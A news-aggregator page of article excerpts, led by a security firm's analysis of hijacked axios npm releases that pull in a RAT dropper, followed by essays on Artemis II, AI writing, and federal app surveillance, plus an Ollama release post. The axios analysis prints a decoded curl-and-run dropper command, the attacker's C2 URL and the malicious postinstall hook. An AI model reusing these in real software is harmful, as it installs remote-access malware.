10 interesting stories served every morning and every evening.
Hijacked maintainer account used to publish poisoned axios releases including 1.14.1 and 0.30.4. The attacker injected a hidden dependency that drops a cross platform RAT. We are actively investigating and will update this post with a full technical analysis. StepSecurity is hosting a community town hall on this incident on April 1st at 10:00 AM PT - Register Here.axios is the most popular JavaScript HTTP client library with over 100 million weekly downloads. On March 30, 2026, StepSecurity identified two malicious versions of the widely used axios HTTP client library published to npm: axios@1.14.1 and axios@0.30.4. The malicious versions inject a new dependency, plain-crypto-js@4.2.1, which is never imported anywhere in the axios source code. Its sole purpose is to execute a postinstall script that acts as a cross platform remote access trojan (RAT) dropper, targeting macOS, Windows, and Linux. The dropper contacts a live command and control server and delivers platform specific second stage payloads. After execution, the malware deletes itself and replaces its own package.json with a clean version to evade forensic detection.There are zero lines of malicious code inside axios itself, and that’s exactly what makes this attack so dangerous. Both poisoned releases inject a fake dependency, plain-crypto-js@4.2.1, a package never imported anywhere in the axios source, whose sole purpose is to run a postinstall script that deploys a cross-platform remote access trojan. The dropper contacts a live command-and-control server, delivers separate second-stage payloads for macOS, Windows, and Linux, then erases itself and replaces its own package.json with a clean decoy. A developer who inspects their node_modules folder after the fact will find no indication anything went wrong.This was not opportunistic. It was precision. The malicious dependency was staged 18 hours in advance. Three payloads were pre-built for three operating systems. Both release branches were poisoned within 39 minutes of each other. Every artifact was designed to self-destruct. Within two seconds of npm install, the malware was already calling home to the attacker’s server before npm had even finished resolving dependencies. This is among the most operationally sophisticated supply chain attacks ever documented against a top-10 npm package.These compromises were detected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have responsibly disclosed the issue to the project maintainers.StepSecurity Harden-Runner, whose community tier is free for public repos and is used by over 12,000 public repositories, detected the compromised axios package making anomalous outbound connections to the attacker’s C2 domain across multiple open source projects. For example, Harden-Runner flagged the C2 callback to sfrclak.com:8000 during a routine CI run in the backstage repository, one of the most widely used developer portal frameworks. The Backstage team has confirmed that this workflow is intentionally sandboxed and the malicious package install does not impact the project. The connection was automatically marked as anomalous because it had never appeared in any prior workflow run. Harden-Runner insights for community tier projects are public by design, allowing anyone to verify the detection: https://app.stepsecurity.io/github/backstage/backstage/actions/runs/23775668703?tab=network-events
[Community Webinar] axios Compromised on npm: What We Know, What You Should Do
Join StepSecurity on April 1st at 10:00 AM PT for a live community briefing on the axios supply chain attack. We’ll walk through the full attack chain, indicators of compromise, remediation steps, and open it up for Q&A.
Register for the webinar →
The attack was pre-staged across roughly 18 hours, with the malicious dependency seeded on npm before the axios releases to avoid “brand-new package” alarms from security scanners:
plain-crypto-js@4.2.0 published by nrwise@proton.me — a clean decoy containing a full copy of the legitimate crypto-js source, no postinstall hook. Its sole purpose is to establish npm publishing history so the package does not appear as a zero-history account during later inspection.
plain-crypto-js@4.2.1 published by nrwise@proton.me — malicious payload added. The postinstall: “node setup.js” hook and obfuscated dropper are introduced.
axios@1.14.1 published by compromised jasonsaayman account (email: ifstap@proton.me) — injects plain-crypto-js@4.2.1 as a runtime dependency, targeting the modern 1.x user base.
axios@0.30.4 published by the same compromised account — identical injection into the legacy 0.x branch, published 39 minutes later to maximize coverage across both release lines.
npm unpublishes axios@1.14.1 and axios@0.30.4. Both versions are removed from the registry and the latest dist-tag reverts to 1.14.0. axios@1.14.1 had been live for approximately 2 hours 53 minutes; axios@0.30.4 for approximately 2 hours 15 minutes. Timestamp is inferred from the axios registry document’s modified field (03:15:30Z) — npm does not expose a dedicated per-version unpublish timestamp in its public API.
npm initiates a security hold on plain-crypto-js, beginning the process of replacing the malicious package with an npm security-holder stub.
npm publishes the security-holder stub plain-crypto-js@0.0.1-security.0 under the npm@npmjs.com account, formally replacing the malicious package on the registry. plain-crypto-js@4.2.1 had been live for approximately 4 hours 27 minutes. Attempting to install any version of plain-crypto-js now returns the security notice.
The attacker compromised the jasonsaayman npm account, the primary maintainer of the axios project. The account’s registered email was changed to ifstap@proton.me — an attacker-controlled ProtonMail address. Using this access, the attacker published malicious builds across both the 1.x and 0.x release branches simultaneously, maximizing the number of projects exposed.Both axios@1.14.1 and axios@0.30.4 are recorded in the npm registry as published by jasonsaayman, making them indistinguishable from legitimate releases at a glance. Both versions were published using the compromised npm credentials of a lead axios maintainer, bypassing the project’s normal GitHub Actions CI/CD pipeline.A critical forensic signal is visible in the npm registry metadata. Every legitimate axios 1.x release is published via GitHub Actions with npm’s OIDC Trusted Publisher mechanism, meaning the publish is cryptographically tied to a verified GitHub Actions workflow. axios@1.14.1 breaks that pattern entirely — published manually via a stolen npm access token with no OIDC binding and no gitHead:// axios@1.14.0 — LEGITIMATE
“_npmUser”: {
“name”: “GitHub Actions”,
“email”: “npm-oidc-no-reply@github.com”,
“trustedPublisher”: {
“id”: “github”,
“oidcConfigId”: “oidc:9061ef30-3132-49f4-b28c-9338d192a1a9″
// axios@1.14.1 — MALICIOUS
“_npmUser”: {
“name”: “jasonsaayman”,
“email”: “ifstap@proton.me”
// no trustedPublisher, no gitHead, no corresponding GitHub commit or tag
}There is no commit or tag in the axios GitHub repository that corresponds to 1.14.1. The release exists only on npm. The OIDC token that legitimate releases use is ephemeral and scoped to the specific workflow — it cannot be stolen. The attacker must have obtained a long-lived classic npm access token for the account.Before publishing the malicious axios versions, the attacker pre-staged plain-crypto-js@4.2.1 from account nrwise@proton.me. This package:Masquerades as crypto-js with an identical description and repository URL pointing to the legitimate brix/crypto-js GitHub repositoryContains “postinstall”: “node setup.js” — the hook that fires the RAT dropper on installPre-stages a clean package.json stub in a file named package.md for evidence destruction after executionThe decoy version (4.2.0) was published 18 hours earlier to establish publishing history - a clean package in the registry that makes nrwise look like a legitimate maintainer.What changed between 4.2.0 (decoy) and 4.2.1 (malicious)A complete file-level comparison between plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 reveals exactly three differences. Every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is identical between the two versions:
The 56 crypto source files are not just similar; they are bit-for-bit identical to the corresponding files in the legitimate crypto-js@4.2.0 package published by Evan Vosberg. The attacker made no modifications to the cryptographic library code whatsoever. This was intentional: any diff-based analysis comparing plain-crypto-js against crypto-js would find nothing suspicious in the library files and would focus attention on package.json — where the postinstall hook looks, at a glance, like a standard build or setup task.The anti-forensics stub (package.md) deserves particular attention. After setup.js runs, it renames package.md to package.json. The stub reports version 4.2.0 — not 4.2.1:// Contents of package.md (the clean replacement stub)
“name”: “plain-crypto-js”,
“version”: “4.2.0″, // ← reports 4.2.0, not 4.2.1 — deliberate mismatch
“description”: “JavaScript library of crypto standards.”,
“license”: “MIT”,
“author”: { “name”: “Evan Vosberg”, “url”: “http://github.com/evanvosberg” },
“homepage”: “http://github.com/brix/crypto-js”,
“repository”: { “type”: “git”, “url”: “http://github.com/brix/crypto-js.git” },
“main”: “index.js”,
// No “scripts” key — no postinstall, no test
“dependencies”: {}
}This creates a secondary deception layer. After infection, running npm list in the project directory will report plain-crypto-js@4.2.0 — because npm list reads the version field from the installed package.json, which now says 4.2.0. An incident responder checking installed packages would see a version number that does not match the malicious 4.2.1 version they were told to look for, potentially leading them to conclude the system was not compromised.# What npm list reports POST-infection (after the package.json swap):
$ npm list plain-crypto-js
myproject@1.0.0
└── plain-crypto-js@4.2.0 # ← reports 4.2.0, not 4.2.1
# but the dropper already ran as 4.2.1
# The reliable check is the DIRECTORY PRESENCE, not the version number:
$ ls node_modules/plain-crypto-js
aes.js cipher-core.js core.js …
# If this directory exists at all, the dropper ran.
# plain-crypto-js is not a dependency of ANY legitimate axios version.The difference between the real crypto-js@4.2.0 and the malicious plain-crypto-js@4.2.1 is a single field in package.json:// crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)
“name”: “crypto-js”,
“version”: “4.2.0″,
“description”: “JavaScript library of crypto standards.”,
“author”: “Evan Vosberg”,
“homepage”: “http://github.com/brix/crypto-js”,
“scripts”: {
“test”: “grunt” // ← no postinstall
// plain-crypto-js@4.2.1 (MALICIOUS — nrwise@proton.me)
“name”: “plain-crypto-js”, // ← different name, everything else cloned
“version”: “4.2.1″, // ← version one ahead of the real package
“description”: “JavaScript library of crypto standards.”,
“author”: { “name”: “Evan Vosberg” }, // ← fraudulent use of real author name
“homepage”: “http://github.com/brix/crypto-js”, // ← real repo, wrong package
“scripts”: {
“test”: “grunt”,
“postinstall”: “node setup.js” // ← THE ONLY DIFFERENCE. The entire weapon.
}The attacker published axios@1.14.1 and axios@0.30.4 with plain-crypto-js: “^4.2.1” added as a runtime dependency — a package that has never appeared in any legitimate axios release. The diff is surgical: every other dependency is identical to the prior clean version.When a developer runs npm install axios@1.14.1, npm resolves the dependency tree and installs plain-crypto-js@4.2.1 automatically. npm then executes plain-crypto-js’s postinstall script, launching the dropper.Phantom dependency: A grep across all 86 files in axios@1.14.1 confirms that plain-crypto-js is never imported or require()’d anywhere in the axios source code. It is added to package.json only to trigger the postinstall hook. A dependency that appears in the manifest but has zero usage in the codebase is a high-confidence indicator of a compromised release.The Surgical Precision of the InjectionA complete binary diff between axios@1.14.0 and axios@1.14.1 across all 86 files (excluding source maps) reveals that exactly one file changed: package.json. Every other file — all 85 library source files, type definitions, README, CHANGELOG, and compiled dist bundles — is bit-for-bit identical between the two versions.# File diff: axios@1.14.0 vs axios@1.14.1 (86 files, source maps excluded)
DIFFERS: package.json
Total differing files: 1
Files only in 1.14.1: (none)
Files only in 1.14.0: (none)# –- axios/package.json (1.14.0)
# +++ axios/package.json (1.14.1)
- “version”: “1.14.0″,
+ “version”: “1.14.1″,
“scripts”: {
“fix”: “eslint –fix lib/**/*.js”,
- “prepare”: “husky”
“dependencies”: {
“follow-redirects”: “^2.1.0″,
“form-data”: “^4.0.1″,
“proxy-from-env”: “^2.1.0″,
+ “plain-crypto-js”: “^4.2.1″
}Two changes are visible: the version bump (1.14.0 → 1.14.1) and the addition of plain-crypto-js. There is also a third, less obvious change: the “prepare”: “husky” script was removed. husky is the git hook manager used by the axios project to enforce pre-commit checks. Its removal from the scripts section is consistent with a manual publish that bypassed the normal development workflow — the attacker edited package.json directly without going through the project’s standard release tooling, which would have re-added the husky prepare script.The same analysis applies to axios@0.30.3 → axios@0.30.4:# –- axios/package.json (0.30.3)
# +++ axios/package.json (0.30.4)
- “version”: “0.30.3″,
+ “version”: “0.30.4″,
“dependencies”: {
“follow-redirects”: “^1.15.4″,
“form-data”: “^4.0.4″,
“proxy-from-env”: “^1.1.0″,
+ “plain-crypto-js”: “^4.2.1″
}Again — exactly one substantive change: the malicious dependency injection. The version bump itself (from 0.30.3 to 0.30.4) is simply the required npm version increment to publish a new release; it carries no functional significance.setup.js is a single minified file employing a two-layer obfuscation scheme designed to evade static analysis tools and confuse human reviewers.All sensitive strings — module names, OS identifiers, shell commands, the C2 URL, and file paths — are stored as encoded values in an array named stq[]. Two functions decode them at runtime:_trans_1(x, r) — XOR cipher. The key “OrDeR_7077” is parsed through JavaScript’s Number(): alphabetic characters produce NaN, which in bitwise operations becomes 0. Only the digits 7, 0, 7, 7 in positions 6–9 survive, giving an effective key of [0,0,0,0,0,0,7,0,7,7]. Each character at position r is decoded as:charCode XOR key[(7 × r × r) % 10] XOR 333_trans_2(x, r) — Outer layer. Reverses the encoded string, replaces _ with =, base64-decodes the result (interpreting the bytes as UTF-8 to recover Unicode code points), then passes the output through _trans_1.The dropper’s entry point is _entry(“6202033″), where 6202033 is the C2 URL path segment. The full C2 URL is: http://sfrclak.com:8000/6202033StepSecurity fully decoded every entry in the stq[] array. The recovered plaintext reveals the complete attack:stq[0] → “child_process” // shell execution
stq[1] → “os” // platform detection
stq[2] → “fs” // filesystem operations
stq[3] → “http://sfrclak.com:8000/” // C2 base URL
stq[5] → “win32” // Windows platform identifier
stq[6] → “darwin” // macOS platform identifier
stq[12] → “curl -o /tmp/ld.py -d packages.npm.org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &”
stq[13] → “package.json” // deleted after execution
stq[14] → “package.md” // clean stub renamed to package.json
stq[15] → ”.exe”
stq[16] → ”.ps1″
stq[17] → ”.vbs”The complete attack path from npm install to C2 contact and cleanup, across all three target platforms.With all strings decoded, the dropper’s full logic can be reconstructed and annotated. The following is a de-obfuscated, commented version of the _entry() function that constitutes the entire dropper payload. Original variable names are preserved; comments are added for clarity.// setup.js — de-obfuscated and annotated
// SHA-256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
...
Read the original on www.stepsecurity.io »
Artemis II Is Not Safe to Fly
“Our test facilities can’t reach the combination of heat flux, pressure, shear stresses, etc., that an actual reentering spacecraft does. We’re always having to wait for the flight test to get the final certification that our system is good to go.”—Jeremy VanderKam, deputy manager for Orion’s heat shield, speaking in 2022
On Wednesday, NASA will attempt to send four astronauts around the moon on a mission called Artemis II. This will be second flight of NASA’s SLS rocket, and the first time the 20-year-old Orion capsule flies with people on board.
The trouble is that the heat shield on Orion blows chunks. Not in some figurative, pejorative sense, but in the sense that when NASA flew this exact mission in 2022, large pieces of material blew out of Orion’s heat shield during re-entry, leaving divots. Large bolts embedded in the heat shield also partially eroded and melted through.
NASA’s initial instinct was to cover up the problem. In early press releases, they stressed that both rocket and spacecraft had performed exceptionally, while declining to publish the post-flight assessment review. The first mention of heat shield damage came from Orion program manager Howard Hu on a call with reporters in March of 2023. Hu said: “we observed there were more variations across the heat shield than we expected; some of the expected char material that we would expect coming back home ablated away differently than what our computer models and what our ground testing predicted.”
Asked by a journalist to quantify the char loss in a January 2024 phone call, Moon-to-Mars Deputy Administrator Amit Kshatriya said: “it was very small localized areas. Interestingly, it would be much easier for us to analyze if we had larger chunks and it was more defined”. A Lockheed Martin representative on the same call added that “there was a healthy margin remaining of that virgin Avcoat. So it wasn’t like there were large, large chunks.”
It wasn’t until May 2024, when the Office of the Inspector General released photographs of the heat shield, that the extent of the damage became clear. The problem wasn’t char loss or excessive ablation, but deep gouges and holes in many of the Avcoat blocks that comprise the heat shield.
The Avcoat material is not designed to come out in chunks. It is supposed to char and flake off smoothly, maintaining the overall contours of the heat shield. But Orion is a fat and heavy spacecraft, about twice as heavy as the Apollo command module it is modeled after. And the Avcoat heat shield is an experimental design. No one has flown a segmented heat shield like this at lunar return speeds, let alone on a spacecraft this heavy.
The substance of the OIG report was as alarming as the pictures. The OIG identified three issues that could potentially kill the crew on Artemis II:
Heat shield spalling. This is the technical term for all those divots. Since spalling leaves voids and gaps in the heat shield material, it can expose the unprotected body of the capsule and lead to burnthrough. Spalling also changes the pattern of hypersonic airflow around the capsule, creating the potential for localized hot spots and cascading effects.
Impact from heat shield fragments. When spalling sends pieces of heat shield into the hypersonic airstream, they can strike the top of the capsule, damaging the parachute compartment. Whether this happened on Artemis I is unknown. As the OIG report pointed out with some frustration, NASA failed to recover either the parachutes or the parachute cover, despite making elaborate plans to do so. Any evidence of debris impact is now at the bottom of the Pacific Ocean.
Bolt erosion. The OIG report noted erosion and melting in four large separation bolts that sit embedded in the heat shield. These bolts are packed with a heat-resistant material and are supposed to be rugged enough to survive re-entry. But three of the four bolts had melted through, due to a flaw in the heating model NASA had used in designing them. The report further noted: ”separation bolt melt beyond the thermal barrier during reentry can expose the vehicle to hot gas ingestion behind the heat shield, exceeding Orion’s structural limits and resulting in the breakup of the vehicle and loss of crew.”
So Orion had come back from the moon with damage severe enough to kill a crew three different ways. Not good!
This left NASA in a quandary. The Orion capsule for Artemis II was already mated to its service module. Taking it off to make changes to the heat shield, even if the agency knew what changes to make, would take years. Nor was there room in the schedule to conduct a flight test, or any spare hardware to conduct the flight test with. Each Orion costs north of a billion dollars, and the only rocket it can launch on (SLS) costs two to four billion dollars a shot, depending on how you do the accounting.
Here it’s worth quoting Admiral Harlold Gehman, who chaired the Columbia Accident Investigation board, on what happens organizationally when a rigid schedule meets an immovable budget:
If a program manager is faced with problems and shortfalls and challenges, if the schedule cannot be extended, he either needs money, or he needs to cut into margin. There were no other options, so guess what the people at NASA did? They started to cut into margins. No one directed them to do this. No one told them to do this. The organization did it, because the individuals in the organization thought they were defending the organization. They thought they were doing what the organization wanted them to do.
And so NASA looked for ways to talk itself into believing it was safe to fly a defective heat shield.
In April 2024, the agency convened an independent review panel. The findings of that panel were not made public, but in December NASA announced that it had found a root cause for the heat shield damage. The Avcoat on the Artemis I heat shield was not sufficiently permeable, and so gas trapped under layers of the material had expanded and blown pieces out of the heat shield. The process had been exacerbated by the re-entry trajectory, which had heating occur in two distinct phases.
This was an awkward finding, since the heat shield NASA would use on Artemis II had been made even less permeable, to make it easier to do ultrasonic testing. But you fly with the heat shield you have, and the agency said it was confident that a change to the re-entry trajectory would be more than adequate to offset any spalling issues.
Somewhat confusingly, they also announced their intention to switch to a new heat shield design, starting with Artemis III. In other words, the Artemis II shield was completely safe to fly, but they were never going to fly it after this mission, and the replacement design would be tested for the first time on a future lunar mission, with astronauts on board.
All of this was kind of preposterous. As the YouTuber Eager Space has pointed out, if a commercial crew capsule (SpaceX Dragon or Boeing Starliner) returned to Earth with the kind of damage seen on Orion, NASA would insist on a redesign and an unmanned test flight to validate it. But the agency does not hold its flagship program to the high standard it demands from commercial crew, even though the same astronaut lives are at stake.
Nor was it lost on observers that the tools and models NASA used to arrive at its new analysis were the same ones that had failed to predict the spalling problem in the first place. While the agency was able to work backwards from flight data to induce flaking in a test coupon of Avcoat, they had no way of predicting how the full-size heat shield would behave in the new flight conditions it would experience on Artemis II.
You don’t have to be a random space blogger to find all this fishy. The most energetic voice of public dissent has been heat shield expert and Shuttle astronaut Charles Camarda, the former Director of Engineering at Johnson Space Center. Aghast at what he saw as a repeat of the motivated reasoning that had led to the loss of Columbia and Challenger, Camarda began making noise both inside and outside the agency, believing that astronauts’ lives were at stake.
In a show of openness, NASA invited Camarda and two journalists to attend a briefing on the heat shield in January of 2026, and gave him limited access to some research materials that have not been made public. But the experience only deepened Camarda’s distress, and he ended up publishing a cri de coeur that I encourage everyone to read in full.
In a nutshell, Camarda argues that NASA is demonstrating the same dysfunction that led to the Columbia and Challenger disasters. Faced with an unexpected engineering failure, it has built toy models to convince itself that the conclusion it wants to reach (it’s safe to fly) are supported by evidence. These toy models are not grounded in physics, but because they appear to be quantitative, they create a false sense of security and understanding, an epistemic fig leaf for management to hide behind.
Put more simply, NASA is going to fly Artemis II based on vibes, hoping that whatever happened to the heat shield on Artemis I won’t get bad enough to harm the crew on Artemis II.
A screen shot from re-entry during Artemis I, showing a large burning fragment of the Orion heat shield
What makes the situation even more frustrating is the fact that, by the program’s own logic, there’s no reason to fly Artemis II with a crew at all.
In the original scheme for Artemis, Artemis II was the only opportunity to fly Orion with astronauts on board before the lunar landing attempt on Artemis III. Artemis III would be a scary mission full of technical firsts (first landing, first use of the lunar lander, first docking in deep space, etc), and it made sense to retire as much technical risk as possible on a dry run around the Moon.
But in early 2026, NASA decided to add an additional Artemis mission to the manifest. The new Artemis III would fly in 2027 as a near-Earth mission to test docking with whatever lunar lander (Blue Origin or SpaceX) was available. The first moon landing would be pushed back to the mission after that, Artemis IV.
This change removed any rationale for flying astronauts on Artemis II. If there are issues with Orion, it is safer for the crew to encounter them in Earth orbit than on a long trip around the Moon. And Artemis II could fly just as easily without astronauts on board, giving ground controllers launch experience and validating (or discrediting) NASA’s heat shield model without endangering a crew. NASA would lose a little face by essentially repeating Artemis I, but doing so would demonstrate that the agency really believes in the safety culture it so often gives lip service to.
Unfortunately, it looks like sunk costs and issues of face will win the day.
The engineers and managers at NASA are not stupid, and they are not cavalier with astronaut’s lives. They’ve read the Rogers Commission and CAIB reports, and many of them remember Challenger and Columbia firsthand. But they exist in a context.
That context is a moon program that has spent close to $100 billion and 25 years with nothing to show for itself, at an agency that has just experienced mass firings and been through a near-death experience with its science budget. The charismatic new Administrator has staked his reputation on increasing launch cadence, and set an explicit goal of landing astronauts on the Moon before President Trump’s term expires in January of 2029.
So people are tying themselves into pretzels to avoid saying the obvious, that the Orion heat shield needs a successful flight test at lunar re-entry speeds to avoid unacceptable risks to the crew.
If the Artemis II crew dies during re-entry, we’ll get another lavishly researched report laying out contributory factors that are plainly visible to anyone following the program right now. The space program will be delayed by years, waiting for investigations to finish and the wrath of Congress to abate. NASA will beat itself up and add more layers of safety bureaucracy, until the same program pressures lead it to make the same mistake again on a future flight.
It’s likely—hopefully very likely—that Artemis II will land safely. But do we really have to wait for astronauts to die to re-learn the same lessons a third time?
Good luck and godspeed to the astronauts on Artemis II.
If you enjoy my writing on space, I invite you to subscribe to my Substack, Mars for the Rest of Us, where I write weekly short essays on topics around Mars exploration.
...
Read the original on idlewords.com »
Don’t Let AI Write For You Go does not allow truthiness Simple Semaphore With a Buffered Channel in Go 🎙️, 🎙️ - Is this thing on? What happens when you go to this site? Everything Useful I Know About kubectl Choosing the right scope function in Kotlin What do data classes give you in Kotlin? How similar is the execution of Java and JavaScript?
Don’t Let AI Write For You When you write a document or essay, you are posing a question and then answering it. For example, a PRD answers the question, “What should we build?” A technical spec answers, “How should we build it?” Sometimes the question is more difficult to answer—“What are we even trying to accomplish?” And with every attempt at answering, you reflect on whether you’re asking the right question.
But now, of course, we have LLMs. I’m seeing an increasing amount of LLM-generated documents, articles, and essays. I want to caution against this. Each LLM-generated document is a missed opportunity to think and build trust.
The goal of writing is not to have written. It is to have increased your understanding, and then the understanding of those around you. When you are tasked to write something, your job is to go into the murkiness and come out of it with structure and understanding. To conquer the unknown.
The second order goal of writing is to become more capable. It is like working out. Every time you do a rep on the boundary of what you can do, you get stronger. It is uncomfortable and effortful.
Letting an LLM write for you is like paying somebody to work out for you.
There are social effects to LLM-generated writing too. When I send somebody a document that whiffs of LLM, I’m only demonstrating that the LLM produced something approximating what others want to hear. I’m not showing that I contended with the ideas.
It undermines my credibility as a person who could lead whatever initiative comes out of this document. That’s unfortunate. I could have used this opportunity to establish credibility.
LLM-generated writing undermines the authenticity of not just one’s writing but of the thinking behind it as well. If the prose is automatically generated, might the ideas be too?
How LLMs can be used in the writing process
LLMs are useful for research and checking your work. They can also work well for quickly recording information or transcribing text (neither of which are what I mean by “writing”, as in “writing an essay”).
They are particularly good at generating ideas. They thrive in this use case because if they generate 10 things and only one is useful, no harm is done. You can take what is useful and leave the rest behind.
These LLMs will increase efficiency in delivering software. But in order to make the most of them, we need a simultaneous rise in our level of thoughtfulness.
...
Read the original on alexhwoods.com »
The federal government released an app yesterday, March 27th, and it’s spyware.
The White House app markets itself as a way to get “unparalleled access” to the Trump administration, with press releases, livestreams, and policy updates. The kind of content that every RSS feed on the planet delivers with one permission: network access. But the White House app, version 47.0.1 (because subtlety died a long time ago), requests precise GPS location, biometric fingerprint access, storage modification, the ability to run at startup, draw over other apps, view your Wi-Fi connections, and read badge notifications. It also ships with 3 embedded trackers including Huawei Mobile Services Core (yes, the Chinese company the US government sanctioned, shipping tracking infrastructure inside the sitting president’s official app), and it has an ICE tip line button that redirects straight to ICE’s reporting page.
This thing also has a “Text the President” button that auto-fills your message with “Greatest President Ever!” and then collects your name and phone number. There’s no specific privacy policy for the app, just a generic whitehouse.gov policy that doesn’t address any of the app’s tracking capabilities.
The White House app might actually be one of the milder ones. I’ve been going through every federal agency app I can find on Google Play, pulling their permissions from Exodus Privacy (which audits Android APKs for trackers and permissions), and what I found deserves its own term. I’m calling it Fedware.
Ok so let me walk you through what the federal government is running on your phone.
The FBI’s app, myFBI Dashboard, requests 12 permissions including storage modification, Wi-Fi scanning, account discovery (it can see what accounts are on your device), phone state reading, and auto-start at boot. It also contains 4 trackers, one of which is Google AdMob, which means the FBI’s official app ships with an ad-serving SDK while also reading your phone identity. From what I found, the FBI’s news app has more trackers embedded than most weather apps.
The FEMA app requests 28 permissions including precise and approximate location, and has gone from 4 trackers in older versions down to 1 in v3.0.14. Twenty-eight permissions for an app whose primary function is showing you weather alerts and shelter locations. To put that in context, the AP News app delivers the same kind of disaster coverage with a fraction of the permissions.
IRS2Go has 3 trackers and 10 permissions in its latest version, and according to a TIGTA audit, the IRS released this app to the public before the required Privacy Impact Assessment was even signed, which violated OMB Circular A-130. The app shares device IDs, app activity, and crash logs with third parties, and TIGTA found that the IRS never confirmed that filing status and refund amounts were masked and encrypted in the app interface.
MyTSA comes in lighter with 9 permissions and 1 tracker, but still requests precise and approximate location. The TSA’s own Privacy Impact Assessment says the app stores location locally and claims it never transmits GPS data to TSA. I’ll give them credit for documenting that, because most of these apps have privacy policies that read like ransom notes.
CBP Mobile Passport Control is where things get genuinely alarming. This one requests 14 permissions including 7 classified as “dangerous”: background location tracking (it follows you even when the app is closed), camera access, biometric authentication, and full external storage read/write. And the whole CBP ecosystem, from CBP One to CBP Home to Mobile Passport Control, feeds data into a network that retains your faceprints for up to 75 years and shares it across DHS, ICE, and the FBI.
The government also built a facial recognition app called Mobile Fortify that ICE agents carry in the field. It draws from hundreds of millions of images across DHS, FBI, and State Department databases. ICE Homeland Security Investigations signed a $9.2 million contract with Clearview AI in September 2025, giving agents access to over 50 billion facial images scraped from the internet. DHS’s own internal documents admit Mobile Fortify can be used to amass biographical information of “individuals regardless of citizenship or immigration status”, and CBP confirmed it will “retain all photographs” including those of U. S. citizens, for 15 years.
Photos submitted through CBP Home, biometric scans from Mobile Passport Control, and faces captured by Mobile Fortify all feed this system. And the EFF found that ICE does not allow people to opt out of being scanned, and agents can use a facial recognition match to determine your immigration status even when other evidence contradicts it. A U. S.-born citizen was told he could be deported based on a biometric match alone.
SmartLINK is the ICE electronic monitoring app, built by BI Incorporated, a subsidiary of the GEO Group (a private prison company that profits directly from how many people ICE monitors), under a $2.2 billion contract. The app collects geolocation, facial images, voice prints, medical information including pregnancy data, and phone numbers of your contacts. ICE’s contract gives them “unlimited rights to use, dispose of, or disclose” all data collected. The app’s former terms of service allowed sharing “virtually any information collected through the application, even beyond the scope of the monitoring plan.” SmartLINK went from 6,000 users in 2019 to over 230,000 by 2022, and in 2019, ICE used GPS data from these monitors to coordinate one of the largest immigration raids in history, arresting around 700 people across six cities in Mississippi.
And if you think your location data is safe because you use regular apps and avoid government ones, the federal government is buying that data too. Companies like Venntel collect 15 billion location points from over 250 million devices every day through SDKs embedded in over 80,000 apps (weather, navigation, coupons, games). DHS, FBI, DOD, and the DEA purchase this data without warrants, creating a constitutional loophole around the Supreme Court’s 2018 Carpenter v. United States ruling that requires a warrant for cellphone location history. The Defense Department even purchased location data from prayer apps to monitor Muslim communities. Police departments used similar data to track racial justice protesters.
And then there’s the IRS-ICE data sharing deal from April 2025. The IRS and ICE signed a Memorandum of Understanding allowing ICE to receive names, addresses, and tax data for people with removal orders. ICE submitted 1.28 million names. The IRS erroneously shared the data of thousands of people who should never have been included. The acting IRS Commissioner, Melanie Krause, resigned in protest. The chief privacy officer quit. One person leaving changes nothing about the institution, and the data was already out the door. A federal judge blocked further sharing in November 2025, ruling it likely violates IRS confidentiality protections, but by then the IRS was already building an automated system to give ICE bulk access to home addresses with minimal human oversight. The court order is a speed bump, and they’ll find another route.
The apps, the databases, and the data broker contracts all feed the same pipeline, and no single agency controls it because they all share it.
The GAO reported in 2023 that nearly 60% of 236 privacy and security recommendations issued since 2010 had still not been implemented. Congress has been told twice, in 2013 and 2019, to pass comprehensive internet privacy legislation. It has done neither. And it won’t, because the surveillance apparatus serves the people who run it, and the people who run it write the laws. Oversight is theater. The GAO issues a report, Congress holds a hearing, everyone performs concern for the cameras, and then the contracts get renewed and the data keeps flowing. It’s working exactly as designed.
The federal government publishes content available through standard web protocols and RSS feeds, then wraps that content in applications that demand access to your location, biometrics, storage, contacts, and device identity. They embed advertising trackers in FBI apps. They sell the line that you need their app to receive their propaganda while the app quietly collects data that flows into the same surveillance pipeline feeding ICE raids and warrantless location tracking. Every single one of these apps could be replaced by a web page, and they know that. The app exists because a web page can’t read your fingerprint, track your GPS in the background, or inventory the other accounts on your device.
You don’t need their app. You don’t need their permission to access public information. You already have a browser, an RSS reader, and the ability to decide for yourself what runs on your own hardware. Use them.
...
Read the original on www.sambent.com »
Today, we’re previewing the fastest way to run Ollama on Apple silicon, powered by MLX, Apple’s machine learning framework.
This unlocks new performance to accelerate your most demanding work on macOS:
* Coding agents like Claude Code, OpenCode, or Codex
Ollama on Apple silicon is now built on top of Apple’s machine learning framework, MLX, to take advantage of its unified memory architecture.
This results in a large speedup of Ollama on all Apple Silicon devices. On Apple’s M5, M5 Pro and M5 Max chips, Ollama leverages the new GPU Neural Accelerators to accelerate both time to first token (TTFT) and generation speed (tokens per second).
Testing was conducted on March 29, 2026, using Alibaba’s Qwen3.5-35B-A3B model quantized to `NVFP4` and Ollama’s previous implementation quantized to `Q4_K_M` using Ollama 0.18. Ollama 0.19 will see even higher performance (1851 token/s prefill and 134 token/s decode when running with `int4`).
Ollama now leverages NVIDIA’s NVFP4 format to maintain model accuracy while reducing memory bandwidth and storage requirements for inference workloads.
As more inference providers scale inference using NVFP4 format, this allows Ollama users to share the same results as they would in a production environment.
It further opens up Ollama to have the ability to run models optimized by NVIDIA’s model optimizer. Other precisions will be made available based on the design and usage intent from Ollama’s research and hardware partners.
Ollama’s cache has been upgraded to make coding and agentic tasks more efficient.
* Lower memory utilization: Ollama will now reuse its cache across conversations, meaning less memory utilization and more cache hits when branching when using a shared system prompt with tools like Claude Code.
* Intelligent checkpoints: Ollama will now store snapshots of its cache at intelligent locations in the prompt, resulting in less prompt processing and faster responses.
* Smarter eviction: shared prefixes survive longer even when older branches are dropped.
This preview release of Ollama accelerates the new Qwen3.5-35B-A3B model, with sampling parameters tuned for coding tasks.
Please make sure you have a Mac with more than 32GB of unified memory.
ollama launch claude –model qwen3.5:35b-a3b-coding-nvfp4
ollama launch openclaw –model qwen3.5:35b-a3b-coding-nvfp4
ollama run qwen3.5:35b-a3b-coding-nvfp4
